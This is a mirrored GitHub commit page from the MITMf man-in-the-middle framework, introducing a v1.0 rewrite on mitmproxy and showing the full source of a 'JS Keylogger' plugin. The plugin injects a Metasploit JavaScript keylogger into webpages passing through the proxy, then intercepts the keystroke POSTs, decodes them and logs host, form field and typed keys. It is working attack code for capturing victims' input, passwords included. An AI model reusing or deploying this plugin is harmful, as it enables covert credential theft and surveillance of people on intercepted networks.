github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 13:32:18 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Initial commit for v1.0 using mitmproxy instead of twisted

Browse source 
Added a plugin system to Net-Creds so you can now add your own parsers,
api hook names might change between now and the offcial release
(will submit a PR to the original repo once completed)

The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts
the code down by an insane amount, no more twisted! yay!

Basic plugin have been re-wrote for the new proxy engine

Since we are using mitmproxy we have out of the box support for SSL/TLS!
This commit is contained in:
byt3bl33d3r 2016-02-06 13:27:08 -07:00
commit eea5f53be2
50 changed files with 5525 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

43
plugins/jskeylogger.py Normal file
View file

@ -0,0 +1,43 @@
from plugins.plugin import Plugin
from plugins.inject import Inject
class JSKeylogger(Plugin):
name = 'JS Keylogger'
optname = 'jskeylogger'
desc = 'Injects a javascript keylogger into clients webpages'
version = '1.0'
def initialize(self, context):
context.js_file = open('plugins/resources/msfkeylogger.js', 'r')
def request(self, context, flow):
if flow.request.method == 'POST' and ('keylog' in flow.request.path):
#Overrides the default POST output
context.handle_post_output = True
raw_keys = flow.request.content.split("&&")[0]
input_field = flow.request.content.split("&&")[1]
keys = raw_keys.split(",")
if keys:
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice[:-1]
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
context.log("[JSKeylogger] Error decoding char: {}".format(n))
context.log("[JSKeylogger] Host: {} | Field: {} | Keys: {}".format(flow.request.host, input_field, nice))
def response(self, context, flow):
Inject().response(context, flow)